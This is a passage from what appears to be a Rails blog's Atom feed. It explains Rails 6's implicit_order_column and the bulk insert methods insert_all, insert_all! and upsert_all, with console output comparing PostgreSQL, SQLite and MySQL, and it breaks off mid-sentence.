      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/34480">implicit_order_column</a>on <code>ActiveRecord::ModelSchema</code> which allows us to define a custom column forimplicit ordering on the model level. If there is no <code>implicit_order_column</code>defined, Rails takes a primary key as the implicit order column. Also, beforeRails 6, the primary key was used to order records implicitly by default.</p><p>This has impact on methods like<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/FinderMethods.html#method-i-first">first</a>,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/FinderMethods.html#method-i-last">last</a>and<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/FinderMethods.html">many more</a>where implicit ordering is used.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt; end=&gt; {:presence=&gt;true}&gt;&gt; User.firstSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-11 00:18:41&quot;, updated_at: &quot;2019-03-11 00:18:41&quot;&gt;&gt;&gt; User.lastSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 2, name: &quot;Mark&quot;, created_at: &quot;2019-03-11 00:20:42&quot;, updated_at: &quot;2019-03-11 00:20:42&quot;&gt;&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt;   self.implicit_order_column = &quot;updated_at&quot;&gt;&gt; end=&gt; Traceback (most recent call last):        2: from (irb):10        1: from (irb):12:in '&lt;class:User&gt;'NoMethodError (undefined method 'implicit_order_column=' for #&lt;Class:0x00007faf4d6cb408&gt;)</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt; end=&gt; {:presence=&gt;true}&gt;&gt; User.firstSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-11 00:18:41&quot;, updated_at: &quot;2019-03-11 00:18:41&quot;&gt;&gt;&gt; User.lastSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 2, name: &quot;Mark&quot;, created_at: &quot;2019-03-11 00:20:42&quot;, updated_at: &quot;2019-03-11 00:20:42&quot;&gt;&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt;   self.implicit_order_column = &quot;updated_at&quot;&gt;&gt; end=&gt; &quot;updated_at&quot;&gt;&gt; User.find(1).touchSELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]UPDATE &quot;users&quot; SET &quot;updated_at&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2  [[&quot;updated_at&quot;, &quot;2019-03-11 00:23:33.369021&quot;], [&quot;id&quot;, 1]]=&gt; true&gt;&gt; User.firstSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;updated_at&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 2, name: &quot;Mark&quot;, created_at: &quot;2019-03-11 00:20:42&quot;, updated_at: &quot;2019-03-11 00:23:09&quot;&gt;&gt;&gt; User.lastSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;updated_at&quot; DESC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-11 00:18:41&quot;, updated_at: &quot;2019-03-11 00:23:33&quot;&gt;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34480">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Bulk insert support in Rails 6]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/bulk-insert-support-in-rails-6"/>
      <updated>2019-04-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/bulk-insert-support-in-rails-6</id>
      <content type="html"><![CDATA[<p>Rails 6 has added support for bulk inserts similar to how bulk update issupported using <code>update_all</code> and bulk delete is supported using <code>delete_all</code>.</p><p>Bulk inserts can be performed using newly added methods: <code>insert_all</code>,<code>insert_all!</code> and <code>upsert_all</code>.</p><p>All of these new methods allow the insertion of multiple records of the samemodel into the database. A single <code>INSERT</code> SQL query is prepared by thesemethods and a single sql statement is sent to the database, withoutinstantiating the model or invoking Active Record callbacks or validations.</p><p>During bulk insertion, violation of primary key, violation of unique indexes,and violation of unique constraints is possible. Rails leveragesdatabase-specific features to either skip, or upsert the duplicates, dependingon the case.</p><p>Let's discuss <code>insert_all</code>, <code>insert_all!</code> and <code>upsert_all</code> methods in detail,which are all used to perform bulk insert.</p><p>We will create an <code>articles</code> table with two unique indexes.</p><pre><code class="language-ruby">create_table :articles do |t|  t.string :title, null: false  t.string :slug, null: false  t.string :author, null: false  t.text :description  t.index :slug, unique: true  t.index [:title, :author], unique: trueend</code></pre><p>Note that we do not allow duplicate <code>slug</code> columns. We also prevent records fromhaving duplicate <code>title</code> and <code>author</code> columns together.</p><p>To try out the examples provided in this blog post, please ensure to alwaysclean up the <code>articles</code> table before running any example.</p><h2>1. Performing bulk inserts by skipping duplicates</h2><p>Let's say we want to insert multiple articles at once into the database. It ispossible that certain records may violate the unique constraint(s) of the table.Such records are considered duplicates.</p><p>In other words, rows or records are determined to be unique by every uniqueindex on the table by default.</p><p>To skip the duplicate rows or records, and insert the rest of the records atonce, we can use <code>ActiveRecord::Persistence#insert_all</code> method.</p><h5>1.1 Behavior with PostgreSQL</h5><p>Let's run the following example on a PostgreSQL database.</p><pre><code class="language-ruby">result = Article.insert_all(  [    { id: 1,      title: 'Handling 1M Requests Per Second',      author: 'John',      slug: '1m-req-per-second' },    { id: 1, # duplicate 'id' here      title: 'Type Safety in Elm',      author: 'George',      slug: 'elm-type-safety' },    { id: 2,      title: 'Authentication with Devise - Part 1',      author: 'Laura',      slug: 'devise-auth-1' },    { id: 3,      title: 'Authentication with Devise - Part 1',      author: 'Laura', # duplicate 'title' &amp; 'author' here      slug: 'devise-auth-2' },    { id: 4,      title: 'Dockerizing and Deploying Rails App to Kubernetes',      author: 'Paul',      slug: 'rails-on-k8s' },    { id: 5,      title: 'Elm on Rails',      author: 'Amanda',      slug: '1m-req-per-second' }, # duplicate 'slug' here    { id: 6,      title: 'Working Remotely',      author: 'Greg',      slug: 'working-remotely' }  ])# Bulk Insert (2.3ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests  [...snip...] 'working-remotely') ON CONFLICT  DO NOTHING RETURNING &quot;id&quot;puts result.inspect#&lt;ActiveRecord::Result:0x00007fb6612a1ad8 @columns=[&quot;id&quot;], @rows=[[1], [2], [4], [6]], @hash_rows=nil, @column_types={&quot;id&quot;=&gt;#&lt;ActiveModel::Type::Integer:0x00007fb65f420078 @precision=nil, @scale=nil, @limit=8, @range=-9223372036854775808...9223372036854775808&gt;}&gt;puts Article.count# 4</code></pre><p>The <code>insert_all</code> method accepts a mandatory argument which should be an array ofhashes with the attributes of the same model. The keys in all hashes should besame.</p><p>Notice the <code>ON CONFLICT DO NOTHING</code> clause in the <code>INSERT</code> query. This clause issupported by PostgreSQL and SQLite databases. This instructs the database thatwhen there is a conflict or a unique key constraint violation during bulk insertoperation, to skip the conflicting record silently and proceed with theinsertion of the next record.</p><p>In the above example, we have exactly 3 records which violate various uniqueconstraints defined on the <code>articles</code> table.</p><p>One of the records being inserted has a duplicate <code>id: 1</code> attribute, whichviolates unique primary key constraint. Another record that has duplicate<code>title: 'Authentication with Devise - Part 1', author: 'Laura'</code> attributesviolates the multi-column unique index defined on <code>title</code> and <code>author</code> columns.Another record has duplicate <code>slug: '1m-req-per-second'</code> attributes violates theunique index defined on the <code>slug</code> column.</p><p>All of these records that violate any unique constraint or unique index areskipped and are not inserted into the database.</p><p>If successful, <code>ActiveRecord::Persistence#insert_all</code> returns an instance of<code>ActiveRecord::Result</code>. The contents of the result vary per database. In case ofPostgreSQL database, this result instance holds information about thesuccessfully inserted records such as the chosen column names, values of thethose columns in each successfully inserted row, etc.</p><p>For PostgreSQL, by default, <code>insert_all</code> method appends <code>RETURNING &quot;id&quot;</code> clauseto the SQL query where <code>id</code> is the primary key(s). This clause instructs thedatabase to return the <code>id</code> of every successfully inserted record. By inspectingthe result, especially the <code>@columns=[&quot;id&quot;], @rows=[[1], [2], [4], [6]]</code>attributes of the result instance, we can see that the records having <code>id</code>attribute with values <code>1, 2, 4 and 6</code> were successfully inserted.</p><p>What if we want to see more attributes and not just the <code>id</code> attribute of thesuccessfully inserted records in the result?</p><p>We should use the optional <code>returning</code> option, which accepts an array ofattribute names, which should be returned for all successfully inserted records!</p><pre><code class="language-ruby">result = Article.insert_all(  [    { id: 1,      title: 'Handling 1M Requests Per Second',      author: 'John',      slug: '1m-req-per-second' },    #...snip...  ],  returning: %w[ id title ])# Bulk Insert (2.3ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests  [...snip...] 'working-remotely') ON CONFLICT  DO NOTHING RETURNING &quot;id&quot;,&quot;title&quot;puts result.inspect#&lt;ActiveRecord::Result:0x00007f902a1196f0 @columns=[&quot;id&quot;, &quot;title&quot;], @rows=[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]], @hash_rows=nil, @column_types={&quot;id&quot;=&gt;#&lt;ActiveModel::Type::Integer:0x00007f90290ca8d0 @precision=nil, @scale=nil, @limit=8, @range=-9223372036854775808...9223372036854775808&gt;, &quot;title&quot;=&gt;#&lt;ActiveModel::Type::String:0x00007f9029978298 @precision=nil, @scale=nil, @limit=nil&gt;}&gt;puts result.pluck(&quot;id&quot;, &quot;title&quot;).inspect#[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]]</code></pre><p>Notice how the <code>INSERT</code> query appends <code>RETURNING &quot;id&quot;,&quot;title&quot;</code> clause and theresult now holds the <code>id</code> and <code>title</code> attributes of the successfully insertedrecords.</p><h5>1.2 Behavior with SQLite</h5><p>Similar to PostgreSQL, the violating records are skipped during the bulk insertoperation performed using <code>insert_all</code> when we run our example on a SQLitedatabase.</p><pre><code class="language-ruby">result = Article.insert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here    #...snip...  ])# Bulk Insert (1.6ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests [...snip...] 'working-remotely') ON CONFLICT  DO NOTHINGputs result.inspect#&lt;ActiveRecord::Result:0x00007fa9df448ff0 @columns=[], @rows=[], @hash_rows=nil, @column_types={}&gt;puts Article.pluck(:id, :title)#[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]]puts Article.count# 4</code></pre><p>Note that since SQLite does not support <code>RETURING</code> clause, it is not being addedto the SQL query. Therefore, the returned <code>ActiveRecord::Result</code> instance doesnot contain any useful information.</p><p>If we try to explicitly use the <code>returning</code> option when the database being usedis SQLite, then the <code>insert_all</code> method throws an error.</p><pre><code class="language-ruby">Article.insert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    #...snip...  ],  returning: %w[ id title ])# ActiveRecord::ConnectionAdapters::SQLite3Adapter does not support :returning (ArgumentError)</code></pre><h5>1.3 Behavior with MySQL</h5><p>The records that violate primary key, unique key constraints, or unique indexesare skipped during bulk insert operation performed using <code>insert_all</code> on a MySQLdatabase.</p><pre><code class="language-ruby">result = Article.insert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here    #...snip...  ])# Bulk Insert (20.3ms)  INSERT INTO `articles`(`id`,`title`,`author`,`slug`) VALUES (1, 'Handling 1M Requests [...snip...] 'working-remotely') ON DUPLICATE KEY UPDATE `id`=`id`puts result.inspect#&lt;ActiveRecord::Result:0x000055d6cfea7580 @columns=[], @rows=[], @hash_rows=nil, @column_types={}&gt;puts Article.pluck(:id, :title)#[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]]puts Article.count# 4</code></pre><p>Here, the <code>ON DUPLICATE KEY UPDATE 'id'='id'</code> clause in the <code>INSERT</code> query isessentially doing the same thing as the <code>ON CONFLICT DO NOTHING</code> clausesupported by PostgreSQL and SQLite.</p><p>Since MySQL does not support <code>RETURING</code> clause, it is not being included in theSQL query and therefore, the result doesn't contain any useful information.</p><p>Explicitly trying to use <code>returning</code> option with <code>insert_all</code> method on a MySQLdatabase throws<code>ActiveRecord::ConnectionAdapters::Mysql2Adapter does not support :returning</code>error.</p><h2>2. Performing bulk inserts by skipping duplicates on a specified unique constraint but raising exception if records violate other unique constraints</h2><p>In the previous case, we were skipping the records that were violating anyunique constraints. In some case, we may want to skip duplicates caused by onlya specific unique index but abort transaction if the other records violate anyother unique constraints.</p><p>The optional <code>unique_by</code> option of the <code>insert_all</code> method allows to define sucha unique constraint.</p><h5>2.1 Behavior with PostgreSQL and SQLite</h5><p>Let's see an example to skip duplicate records that violate only the specifiedunique index <code>:index_articles_on_title_and_author</code> using <code>unique_by</code> option. Theduplicate records that do not violate <code>index_articles_on_title_and_author</code> indexare not skipped, and therefore throw an error.</p><pre><code class="language-ruby">result = Article.insert_all(  [    { .... },    { .... }, # duplicate 'id' here    { .... },    { .... }, # duplicate 'title' and 'author' here    { .... },    { .... }, # duplicate 'slug' here    { .... }  ],  unique_by: :index_articles_on_title_and_author)# PG::UniqueViolation: ERROR:  duplicate key value violates unique constraint &quot;articles_pkey&quot; (ActiveRecord::RecordNotUnique)# DETAIL:  Key (id)=(1) already exists.</code></pre><p>In case of SQLite, the error appears as shown below.</p><pre><code class="language-text"># SQLite3::ConstraintException: UNIQUE constraint failed: articles.id (ActiveRecord::RecordNotUnique)</code></pre><p>In this case we get <code>ActiveRecord::RecordNotUnique</code> error which is caused by theviolation of primary key constraint on the <code>id</code> column.</p><p>It didn't skip the second record in the example above which violated the uniqueindex on primary key <code>id</code> since the <code>unique_by</code> option was specified with adifferent unique index.</p><p>When an exception occurs, no record persists to the database since <code>insert_all</code>executes just a single SQL query.</p><p>The <code>unique_by</code> option can be identified by columns or a unique index name.</p><p><code>~~~ruby</code> unique_by: :index_articles_on_title_and_author</p><h2>is same as</h2><p>unique_by: %i[ title author ]</p><h2>Also,</h2><p>unique_by: :slug</p><h2>is same as</h2><p>unique_by: %i[ :slug ]</p><h2>and also same as</h2><p>unique_by: :index_articles_on_slug</p><pre><code class="language-ruby">Let's remove (or fix) the record that has duplicate primary keyandre-run the above example.~~~rubyresult = Article.insert_all(  [    { .... },    { .... },    { .... },    { .... }, # duplicate 'title' and 'author' here    { .... },    { .... }, # duplicate 'slug' here    { .... }  ],  unique_by: :index_articles_on_title_and_author)# PG::UniqueViolation: ERROR:  duplicate key value violates unique constraint &quot;index_articles_on_slug&quot; (ActiveRecord::RecordNotUnique)# DETAIL:  Key (slug)=(1m-req-per-second) already exists.</code></pre><p>In case of SQLite, the error looks appears as shown below.</p><pre><code class="language-ruby"># SQLite3::ConstraintException: UNIQUE constraint failed: articles.slug (ActiveRecord::RecordNotUnique)</code></pre><p>The <code>ActiveRecord::RecordNotUnique</code> error in the example above now says the<code>index_articles_on_slug</code> unique constraint is violated. Note how itintentionally didn't raise an error for the unique constraint violated on the<code>title</code> and <code>author</code> columns by the fourth record in the examples above.</p><p>Now we will remove (or fix) the record that has same slug.</p><pre><code class="language-ruby">result = Article.insert_all(  [    { .... },    { .... },    { .... },    { .... }, # duplicate 'title' and 'author' here    { .... },    { .... },    { .... }  ],  unique_by: :index_articles_on_title_and_author)# Bulk Insert (2.5ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests Per Second', [...snip...] 'working-remotely') ON CONFLICT (&quot;title&quot;,&quot;author&quot;) DO NOTHING RETURNING &quot;id&quot;puts result.inspect#&lt;ActiveRecord::Result:0x00007fada2069828 @columns=[&quot;id&quot;], @rows=[[1], [7], [2], [4], [5], [6]], @hash_rows=nil, @column_types={&quot;id&quot;=&gt;#&lt;ActiveModel::Type::Integer:0x00007fad9fdb9df0 @precision=nil, @scale=nil, @limit=8, @range=-9223372036854775808...9223372036854775808&gt;}&gt;</code></pre><p>Here, the fourth record was skipped since that record violates the unique index<code>index_articles_on_title_and_author</code> specified by the <code>unique_by</code> option.</p><p>Similarly, we can specify a different unique index using the <code>unique_by</code> option.For example, if we specify <code>unique_by: :slug</code> option then the records containingduplicate <code>slug</code> columns will be skipped, but would raise<code>ActiveRecord::RecordNotUnique</code> exception if any record violates other uniqueconstraints.</p><h5>2.2 Behavior with MySQL</h5><p>The <code>unique_by</code> option is not supported when the database is MySQL.</p><h2>3. Raising exception if any of the records being bulk inserted violate any unique constraints</h2><p>The <code>insert_all!</code> method (with bang version) never skips a duplicate record. Ifa record violates any unique constraints, then <code>insert_all!</code> method would simplythrow an <code>ActiveRecord::RecordNotUnique</code> error.</p><p>When database is PostgreSQL, <code>insert_all!</code> method can accept optional<code>returning</code> option, which we discussed in depth in 1.1 section above.</p><p>The <code>unique_by</code> option is not supported by the <code>insert_all!</code> method.</p><h2>4. Performing bulk upserts (updates or inserts)</h2><p>So far, in the sections 1, 2 and 3 above, we discussed either skipping theduplicates or raising an exception if a duplicate is encountered during bulkinserts. Sometimes, we want to update the existing record when a duplicateoccurs otherwise insert a new record. This operation is called upsert becauseeither it tries to update the record, or if there is no record to update, thenit tries to insert.</p><p>The <code>upsert_all</code> method in Rails 6 allows performing bulk upserts.</p><p>Let's see it's usage and behavior with different database systems.</p><h6>4.1 <code>upsert_all</code> in MySQL</h6><p>Let's try to bulk upsert multiple articles containing some duplicates.</p><pre><code class="language-ruby">result = Article.upsert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    { id: 1, .... }, # duplicate 'id' here    { id: 2, .... },    { id: 3, .... }, # duplicate 'title' and 'author' here    { id: 4, .... },    { id: 5, .... }, # duplicate 'slug' here    { id: 6, .... }  ])# Bulk Insert (26.3ms)  INSERT INTO `articles`(`id`,`title`,`author`,`slug`) VALUES (1, 'Handling 1M Requests Per Second', 'John', [...snip...] 'working-remotely') ON DUPLICATE KEY UPDATE `title`=VALUES(`title`),`author`=VALUES(`author`),`slug`=VALUES(`slug`)puts result.inspect#&lt;ActiveRecord::Result:0x000055a43c1fae10 @columns=[], @rows=[], @hash_rows=nil, @column_types={}&gt;puts Article.count# 5puts Article.all#&lt;ActiveRecord::Relation [#&lt;Article id: 1, title: &quot;Type Safety in Elm&quot;, slug: &quot;elm-type-safety&quot;, author: &quot;George&quot;, description: nil&gt;, #&lt;Article id: 2, title: &quot;Authentication with Devise - Part 1&quot;, slug: &quot;devise-auth-2&quot;, author: &quot;Laura&quot;, description: nil&gt;, #&lt;Article id: 4, title: &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;, slug: &quot;rails-on-k8s&quot;, author: &quot;Paul&quot;, description: nil&gt;, #&lt;Article id: 5, title: &quot;Elm on Rails&quot;, slug: &quot;1m-req-per-second&quot;, author: &quot;Amanda&quot;, description: nil&gt;, #&lt;Article id: 6, title: &quot;Working Remotely&quot;, slug: &quot;working-remotely&quot;, author: &quot;Greg&quot;, description: nil&gt;]&gt;</code></pre><p>The persisted records in the database look exactly as intended. Let's discuss itin detail.</p><p>The second row in the input array that has the <code>id: 1</code> attribute replaced thefirst row, which also had the duplicate <code>id: 1</code> attribute.</p><p>The fourth row that has <code>id: 3</code> replaced the attributes of the third row sinceboth had duplicate &quot;title&quot; and &quot;author&quot; attributes.</p><p>The rest of the rows were not duplicates or no longer became duplicates, andtherefore were inserted without any issues.</p><p>Note that the <code>returning</code> and <code>unique_by</code> options are not supported in the<code>upsert_all</code> method when the database is MySQL.</p><h6>4.2 <code>upsert_all</code> in SQLite</h6><p>Let's try to execute the same example from the above section 4.1 when databaseis SQLite.</p><pre><code class="language-ruby">result = Article.upsert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here    { id: 4, title: 'Dockerizing and Deploying Rails App to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }  ])# Bulk Insert (4.0ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests Per Second', [...snip...] 'working-remotely') ON CONFLICT (&quot;id&quot;) DO UPDATE SET &quot;title&quot;=excluded.&quot;title&quot;,&quot;author&quot;=excluded.&quot;author&quot;,&quot;slug&quot;=excluded.&quot;slug&quot;# SQLite3::ConstraintException: UNIQUE constraint failed: articles.title, articles.author (ActiveRecord::RecordNotUnique)</code></pre><p>The bulk upsert operation failed in the above example due to<code>ActiveRecord::RecordNotUnique</code> exception.</p><p>Why it didn't work similar to MySQL?</p><p>As per the documentation of MySQL, an upsert operation takes place if a newrecord violates any unique constraint.</p><p>Whereas, in case of SQLite, by default, new record replaces existing record whenboth the existing and new record have the same primary key. If a record violatesany other unique constraints other than the primary key, it then raises<code>ActiveRecord::RecordNotUnique</code> exception.</p><p>The <code>ON CONFLICT (&quot;id&quot;) DO UPDATE</code> clause in the SQL query above conveys thesame intent.</p><p>Therefore, <code>upsert_all</code> in SQLite doesn't behave exactly same as in MySQL.</p><p>As a workaround, we will need to upsert records with the help of multiple<code>upsert_all</code> calls with the usage of <code>unique_by</code> option.</p><p>If a duplicate record is encountered during the upsert operation, which violatesthe unique index specified using <code>unique_by</code> option then it will replace theattributes of the existing matching record.</p><p>Let's try to understand this workaround with another example.</p><pre><code class="language-ruby">Article.upsert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here  ],  unique_by: :id)Article.upsert_all(  [    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here    { id: 4, title: 'Dockerizing and Deploying Rails App to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }  ],  unique_by: %i[ title author ])puts Article.count# 5puts Article.all#&lt;ActiveRecord::Relation [#&lt;Article id: 1, title: &quot;Type Safety in Elm&quot;, slug: &quot;elm-type-safety&quot;, author: &quot;George&quot;, description: nil&gt;, #&lt;Article id: 2, title: &quot;Authentication with Devise - Part 1&quot;, slug: &quot;devise-auth-2&quot;, author: &quot;Laura&quot;, description: nil&gt;, #&lt;Article id: 4, title: &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;, slug: &quot;rails-on-k8s&quot;, author: &quot;Paul&quot;, description: nil&gt;, #&lt;Article id: 5, title: &quot;Elm on Rails&quot;, slug: &quot;1m-req-per-second&quot;, author: &quot;Amanda&quot;, description: nil&gt;, #&lt;Article id: 6, title: &quot;Working Remotely&quot;, slug: &quot;working-remotely&quot;, author: &quot;Greg&quot;, description: nil&gt;]&gt;</code></pre><p>Here, we first tried to upsert all the records which violated the unique primarykey index on <code>id</code> column. Later, we upsert successfully all the remainingrecords, which violated the unique index on the <code>title</code> and <code>author</code> columns.</p><p>Note that since the first record's <code>slug</code> attribute was already replaced withthe second record's <code>slug</code> attribute; the last second record having <code>id: 5</code>didn't raise an exception because of duplicate <code>slug</code> column.</p><h6>4.3 <code>upsert_all</code> in PostgreSQL</h6><p>We will run the same example in the 4.1 section above with PostgreSQL database.</p><pre><code class="language-ruby">result = Article.upsert_all(  [    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here    { id: 4, title: 'Dockerizing and Deploying Rails App to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }  ])# PG::CardinalityViolation: ERROR:  ON CONFLICT DO UPDATE command cannot affect row a second time (ActiveRecord::StatementInvalid)# HINT:  Ensure that no rows proposed for insertion within the same command have duplicate constrained values.</code></pre><p>The bulk upsert operation failed in the above example due to<code>ActiveRecord::StatementInvalid</code> exception which was caused by another<code>PG::CardinalityViolation</code> exception.</p><p>The <code>PG::CardinalityViolation</code> exception originates from<a href="https://github.com/postgres/postgres/blob/beeb8e2e0717065296dc7b32daba2d66f0f931dd/src/backend/executor/nodeModifyTable.c#L1335-L1355">here</a>.</p><p>The <code>PG::CardinalityViolation</code> exception occurs when a row cannot be updated asecond time in the same <code>ON CONFLICT DO UPDATE</code> SQL query. PostgreSQL assumesthis behavior would lead the same row to updated a second time in the same SQLquery, in unspecified order, non-deterministically.</p><p>PostgreSQL recommends it is the developer's responsibility to prevent thissituation from occurring.</p><p>Here's more discussion about this issue -<a href="https://github.com/rails/rails/issues/35519">rails/rails#35519</a>.</p><p>Therefore, the <code>upsert_all</code> method doesn't work as intended due to the abovelimitation in PostgreSQL.</p><p>As a workaround, we can divide the single <code>upsert_all</code> query into multiple<code>upsert_all</code> queries with the use of <code>unique_by</code> option similar to how we did incase of SQLite in the 4.2 section above.</p><pre><code class="language-ruby">Article.insert_all(  [    { id: 1, title: 'Handling 1M requests per second', author: 'John', slug: '1m-req-per-second' },    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },    { id: 4, title: 'Dockerizing and deploy Rails app to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }  ])Article.upsert_all(  [    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here  ])Article.upsert_all(  [    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here  ],  unique_by: :index_articles_on_title_and_author)Article.upsert_all(  [    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here  ])puts Article.count# 5puts Article.all#&lt;ActiveRecord::Relation [#&lt;Article id: 1, title: &quot;Type Safety in Elm&quot;, slug: &quot;elm-type-safety&quot;, author: &quot;George&quot;, description: nil&gt;, #&lt;Article id: 2, title: &quot;Authentication with Devise - Part 1&quot;, slug: &quot;devise-auth-2&quot;, author: &quot;Laura&quot;, description: nil&gt;, #&lt;Article id: 4, title: &quot;Dockerizing and deploy Rails app to Kubernetes&quot;, slug: &quot;rails-on-k8s&quot;, author: &quot;Paul&quot;, description: nil&gt;, #&lt;Article id: 5, title: &quot;Elm on Rails&quot;, slug: &quot;1m-req-per-second&quot;, author: &quot;Amanda&quot;, description: nil&gt;, #&lt;Article id: 6, title: &quot;Working Remotely&quot;, slug: &quot;working-remotely&quot;, author: &quot;Greg&quot;, description: nil&gt;]&gt;</code></pre><p>For reference, note that the <code>upsert_all</code> method also accepts <code>returning</code> optionfor PostgreSQL which we 